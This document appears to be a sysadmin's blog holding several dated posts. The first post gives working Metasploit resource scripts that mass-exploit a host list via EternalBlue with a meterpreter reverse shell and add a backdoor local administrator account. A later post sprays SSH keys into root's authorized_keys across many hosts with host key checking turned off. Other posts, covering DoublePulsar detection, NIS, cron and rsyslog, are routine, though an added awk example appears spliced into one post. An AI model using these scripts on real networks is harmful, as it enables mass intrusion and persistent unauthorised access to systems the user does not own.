Thursday, August 16, 2018

remotely exploit a number of hosts with metasploit via eternalblue

in a previous post i have mentioned how to do a scan for doublepulsar infected hosts and how to feed these hosts to msf. that's fine. but, i guess mass-exploiting those hosts is of some utility, too.
 
   
## msfconsole

```
msf > vulns -R
… a lot of text … look at the end of the output for the file it drops in /tmp, e.g.
RHOSTS => file:/tmp/msf-db-rhosts-20180816-27096-ncow7k

msf > exit
```

```
# cd ~/.msf4/
# cp /tmp/msf-db-rhosts-20180816-27096-ncow7k thewicked
# msfconsole -r doublepulsar-loop.rc
```

Once everything has completed, look through ~/.msf4/logs/doublepulsar.log for adminuser,
as those hosts have had the local admin user for your evil created.

## files
   
[doublepulsar-loop.rc]

```
<ruby>

# the rhosts from vuln_db
hostsfile = "/root/.msf4/thewicked"
hosts = []
File.open(hostsfile, "r") do |f|
  f.each_line do |line|
    hosts.push line.strip
  end
end

# msfconsole commands with chained post exploit
self.run_single("resource /root/.msf4/doublepulsar.rc")

# the rhosts loop
hosts.each do |rhost|
  self.run_single("set rhost #{rhost}")
  self.run_single("exploit")
  self.run_single("sleep 2s")
end

</ruby>
```

[doublepulsar.rc]

```
spool /root/.msf4/logs/doublepulsar.log
set consolelogging true
set loglevel 5
set sessionlogging true
set timestampoutput true

use exploit/windows/smb/ms17_010_eternalblue
set VerifyArch False
set VerifyTarget False
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST
set AUTORUNSCRIPT multiscript -rc /root/.msf4/doublepulsar-lsadmin
```

[doublepulsar-lsadmin]

```
execute -H -f cmd.exe -a "/c net user adminuser badpassword /add"
execute -H -f cmd.exe -a "/c net localgroup administrators /add adminuser"
execute -H -f cmd.exe -a "/c bitsadmin task to download a scheduled task to patch and reboot"
exit
```
   
   

Monday, August 13, 2018

one-off doublepulsar scan script because sometimes people need to do one thing and one thing only

so yeah.
```bash
#!/bin/bash
EXECUTE=$(date "+%Y%m%d")

read -p "Enter IP to evaluate: " IP
if [[ $IP =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
    read -p "Enter email address (or not): " EMAIL
else
    echo "Not a valid IP" && exit 1
fi

rm -rf /tmp/$IP
mkdir /tmp/$IP
cd /tmp/$IP

#msfconsole
sudo msfconsole -x "color false ; banner false ; spool /tmp/$IP/output.msf ; use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS $IP ; run; exit"
sed 's/]\ /\\\n/g' /tmp/$IP/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' | sort -u > /tmp/$IP/output.msf.1
sed '/VULNERABLE/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.VULN
sed '/INFECTED/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.INFECTED
clear

if [ -s /tmp/$IP/output.msf.INFECTED ]
then
    echo " Uh oh $IP DoublePulsar infected"
    mail -s " $IP DoublePulsar infected " $EMAIL < /tmp/$IP/output.msf.INFECTED
    mail -s " $IP DoublePulsar infected $EXECUTE " youreffingsysadmin@hell.com < /tmp/$IP/output.msf.1
else
    echo " Phew $IP not infected "
fi

if [ -s /tmp/$IP/output.msf.VULN ]
then
    echo " Sigh $IP DoublePulsar vulnerable "
    mail -s " $IP DoublePulsar vulnerable " $EMAIL < /tmp/$IP/output.msf.1
else
    echo " Double Phew $IP not DoublePulsar vulnerable"
fi

cd /tmp
rm -rf /tmp/$IP

exit 0
```
   

Friday, July 20, 2018

cron job for doublepulsar detection, burning, metasploit scan, and email of results

double pulsar is a major drag. it is a nasty worm that hangs out and acts as a backdoor on a system. it is propagated by smbv1 trans2 calls. fun stuff. i needed to figure out how to automate discovery, burning, and identification of vulnerable systems. oh, and email me the results.

here's what i came up with:
```
$ dpkg-reconfigure exim4-config
$ apt-get install msf
$ searchsploit -u
$ apt-get install masscan
$ git clone https://github.com/countercept/doublepulsar-detection-script.git
$ mkdir -p /root/scripts
$ mkdir -p /root/to.process
$ echo "." > /root/to.process/empty
```

-- script doublepulsar.cron in /root/scripts --

```bash
#!/bin/bash
NETWORKRANGE=6.6.6.0/24
PROCESS=/root/to.process
EXECUTE=$(date "+%Y%m%d")
NAME=HELL

cd $PROCESS

#masscan
masscan -p445 $NETWORKRANGE > $PROCESS/output.masscan
sed -i "s/^.* on //" $PROCESS/output.masscan

#detect
/root/doublepulsar-detection-script/detect_doublepulsar_smb.py --file \
$PROCESS/output.masscan --uninstall --threads 100 --timeout 2 > \
$PROCESS/output.detect
sed '/DETECTED/!d' $PROCESS/output.detect > $PROCESS/output.detect.INFECTED

#msfconsole
msfconsole -x "color false ; spool $PROCESS/output.msf ; \
use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS file:$PROCESS/output.masscan ; set THREADS 100; run; exit"
sed 's/]\ /\\\n/g' $PROCESS/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' | sort -u > $PROCESS/output.msf.1
sed '/VULNERABLE/!d' $PROCESS/output.msf.1 > $PROCESS/output.msf.VULN
sed '/INFECTED/!d' $PROCESS/output.msf.1 > $PROCESS/output.msf.INFECTED

#mail
if [ -s $PROCESS/output.detect.INFECTED ]
then
        mail -s "DoublePulsar Detect Infected Hosts $NETWORKRANGE" me@here < $PROCESS/output.detect.INFECTED
else
        mail -s "No DoublePulsar Detect Infected Hosts $NETWORKRANGE" me@here < $PROCESS/empty
fi

if [ -s $PROCESS/output.msf.INFECTED ]
then
        cat $PROCESS/output.msf.INFECTED $PROCESS/output.msf.VULN >> $PROCESS/output.msf.INFECTEDVULN
        mail -s "DoublePulsar MetaSploit Infected and Vulnerable Hosts $NETWORKRANGE" me@here < $PROCESS/output.msf.INFECTEDVULN
else
        mail -s "No DoublePulsar MetaSploit Vulnerable Hosts $NETWORKRANGE" me@here < $PROCESS/empty
fi

#cleanup
mkdir -p $PROCESS/$NAME/$EXECUTE
mv output.* $PROCESS/$NAME/$EXECUTE

exit
```

-- end script --
run it every night, every hour, whenever. put it in /etc/crontab:

```
# evil
30 12   * * *   root    /root/scripts/doublepulsar.cron
```

the joy of the script is that, with all the text processing, the output can be piped straight to syslog. so yeah, old news for you...
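both the one-off script and this cron job split the smb_ms17_010 spool into VULNERABLE and INFECTED lists with the same sed chain. here, as an added example that is not from the original posts, is the same split done with awk over a constructed sample spool; the exact line shapes are an assumption based on the strings the sed chain matches:

```bash
#!/bin/bash
# Added example, not code from the original post: splits an smb_ms17_010
# spool into VULNERABLE / INFECTED host lists without the sed chain.
# SAMPLE_SPOOL is CONSTRUCTED; the line shapes are an assumption based on
# the strings the post's sed pipeline matches (VULNERABLE, INFECTED, NOT, Error).
SAMPLE_SPOOL=$(cat <<'EOF'
[*] 6.6.6.10:445   - Host does NOT appear vulnerable
[+] 6.6.6.11:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[+] 6.6.6.12:445   - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[+] 6.6.6.12:445   - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x00000000
[-] 6.6.6.13:445   - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] Scanned 4 of 4 hosts (100% complete)
[*] Auxiliary module execution completed
EOF
)

# stdin: spool text.  stdout: one "<ip> <STATE>" line per finding, STATE being
# VULNERABLE or INFECTED.  An infected host is also vulnerable, so it appears twice.
ms17_010_hosts() {
    awk '
        function host(line,  f) { split(line, f, " "); sub(/:[0-9]+$/, "", f[2]); return f[2] }
        /Host is likely VULNERABLE/ { print host($0), "VULNERABLE" }
        /Host is likely INFECTED/   { print host($0), "INFECTED" }
    ' | sort -u
}

# the two lists the cron job mails out (output.msf.VULN / output.msf.INFECTED)
vulnerable_hosts() { ms17_010_hosts | awk '$2 == "VULNERABLE" { print $1 }'; }
infected_hosts()   { ms17_010_hosts | awk '$2 == "INFECTED"   { print $1 }'; }

# worst state for one host, matching the one-off script's three branches:
# INFECTED beats VULNERABLE beats CLEAN.  $1 = ip, spool on stdin.
host_status() {
    local states
    states=$(ms17_010_hosts | awk -v h="$1" '$1 == h { print $2 }')
    case "$states" in
        *INFECTED*)   echo INFECTED ;;
        *VULNERABLE*) echo VULNERABLE ;;
        *)            echo CLEAN ;;
    esac
}

printf '%s\n' "$SAMPLE_SPOOL" | vulnerable_hosts       # 6.6.6.11 and 6.6.6.12
printf '%s\n' "$SAMPLE_SPOOL" | infected_hosts         # 6.6.6.12
printf '%s\n' "$SAMPLE_SPOOL" | host_status 6.6.6.13   # CLEAN: a login error is not a finding
```

a scan error like the 6.6.6.13 line is neither vulnerable nor infected, so it is dropped rather than mailed; the original sed chain relies on the "Error" word for the same effect.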

Thursday, March 22, 2018

nis master server settings on cloned system

i need to change nis master server settings on a cloned system. don't even ask.

commands:

```
# domainname <newdomainname>
# mv /var/yp/<domainname> /var/yp/<newdomainname>
```

edit:

```
/etc/hosts              change <hostname> to <newhostname>; <ip> to <newip>
/etc/conf.d/net         change <domainname> to <newdomainname>
/etc/yp.conf            change <domainname> to <newdomainname>
/etc/ypserv.conf
/etc/ypserv.securenets
/var/yp/ypservers       change <hostname> to <newhostname>
```

then rebuild the maps:

```
# make -C /var/yp
```

test:

```
# ypwhich
```
should return <newhostname>

```
# ypcat passwd | grep <username>
# ypcat group | grep <groupname>
```
both should return known results

Wednesday, March 7, 2018

put pubkeys on a lot of hosts

i need to zap authorized_keys *all over the place*.
this appends a file containing several id_rsa.pub keys to root's authorized_keys on every node.

nodes is a long list of ip addresses.

```bash
#!/bin/bash

for i in $(cat nodes) ; do
    ssh -o ConnectTimeout=5 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null \
        -t -t -t -l root $i 'cat >> /root/.ssh/authorized_keys' < authorized_keys.add
done
```

Thursday, February 8, 2018

when crond is using /bin/sh

crond uses sh by default. that last cron script i posted, well, tee is broke in sh. do this:

```
0 12 * * * root script.sh 2>&1 | bash -c 'tee >(/usr/bin/logger -p local6.notice -t script_tag ) >(mail -s "script output" me@here) >/dev/null'
```

Monday, February 5, 2018

debug rsyslogd

why isn't rsyslogd sending anything out?

```
window 1 $ tcpdump -u dst port 514
window 2 $ logger -n 6.6.6.6 -P 514 "hello god"

<no answer>
```

hmm. let's debug rsyslogd

```
$ export RSYSLOG_DEBUGLOG="/tmp/debuglog"
$ export RSYSLOG_DEBUG="Debug"
$ service rsyslog stop
$ rsyslogd -d | head -10

7160.005597645:7fae096a3780: rsyslogd 7.2.6 startup, module path '', cwd:/root
7160.005872662:7fae096a3780: caller requested object 'net', not found (iRet -3003)
7160.005895004:7fae096a3780: Requested to load module 'lmnet'
7160.005906331:7fae096a3780: loading module '/lib64/rsyslog/lmnet.so'
7160.006023505:7fae096a3780: module lmnet of type 2 being loaded (keepType=0).
7160.006030872:7fae096a3780: entry point 'isCompatibleWithFeature' not present in module
7160.006033780:7fae096a3780: entry point 'setModCnf' not present in module
7160.006036209:7fae096a3780: entry point 'getModCnfName' not present in module
7160.006038359:7fae096a3780: entry point 'beginCnfLoad' not present in module
```

bad modules.

recompile.